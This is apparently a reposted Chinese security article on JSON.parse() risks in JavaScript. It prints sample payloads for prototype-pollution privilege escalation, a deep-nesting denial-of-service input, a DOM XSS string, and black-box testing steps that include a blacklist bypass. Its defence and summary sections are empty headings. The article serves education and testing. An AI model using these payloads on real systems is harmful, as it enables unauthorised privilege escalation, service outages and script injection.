🔍 一段简单的 JSON 解析代码，可能是一次严重的原型污染、提权绕过、服务瘫痪的开始。本文深入解析 JSON.parse() 的安全风险、攻击方式，并讲解如何在黑盒测试中通过数据包行为反推出后台逻辑，为你打开攻防对抗中的新视角。

📌 1. JSON.parse 是什么？它本身安全吗？

JSON.parse() 是 JavaScript 原生函数，用于将字符串解析为 JavaScript 对象：

const obj = JSON.parse('{"user":"admin"}');

✅ 它本身不会执行代码、不会像 Java 反序列化一样触发远程类加载或代码执行。

❗️但它存在安全隐患的传播点，关键在于：你如何使用解析后的对象！

🔥 2. 典型安全风险与利用场景

✅ 风险一：原型链污染（Prototype Pollution）

关键字段如 __proto__ / constructor / prototype 被写入对象中，通过合并操作传播到所有对象。

🧪 利用前提：

• 后端用 Object.assign、lodash.merge 等合并用户传参与默认配置。
• 没有进行关键字段过滤。

📦 典型 payload：

{
"__proto__": {
"admin": true
  }
}

💥 后果示例：

const config = Object.assign({}, defaultConfig, JSON.parse(userInput));
// 之后任何 new Object() 都可能带上 admin: true

📦 常见数据包格式

POST /api/profile HTTP/1.1
Host: target.example.com
Content-Type: application/json
Content-Length: 70

{
  "__proto__": {
    "isAdmin": true
  }
}

✅ Burp 分析方法：

如果行为生效，将获得Admin权限，页面菜单等权限将有明显改变

✅ 风险二：拒绝服务攻击（Billion Laughs / Deep Nesting DoS）

{
"a":{"a":{"a":{"a":{"a":{"a":{"a":{"a":{"a":{"a":{}}}}}}}}}}
}

• 重复嵌套结构触发 CPU 暴涨或内存崩溃。
• 常用于前期探测、WAF 绕过测试。

✅ 风险三：DOM-Based XSS（前端使用不当）

如果前端用 innerHTML 或 document.write 直接渲染 JSON 解析的字段：

const data = JSON.parse(payload);
document.body.innerHTML = data.content;

攻击者构造：

{"content": "<img src=x onerror=alert(1)>"}

🧠 3. 数据包特征分析

我们如何**在黑盒测试中识别系统内部使用了 JSON.parse()**？以下是典型思路：

🧩 特征：API 接收 JSON 格式 body

POST /api/config HTTP/1.1
Content-Type: application/json

{"username":"admin"}

📍 判断方式分析：

🛠️ 组合测试

• 提交 __proto__ → 检查是否持久化
• 提交 constructor.prototype.polluted = true → 检查全局污染迹象
• 利用 ["__proto__"] 数组索引写入，绕过某些黑名单
• 使用深嵌套 JSON → 检测解析限制

🧯 4. 防御建议

✅ 总结

阅读原文：原文链接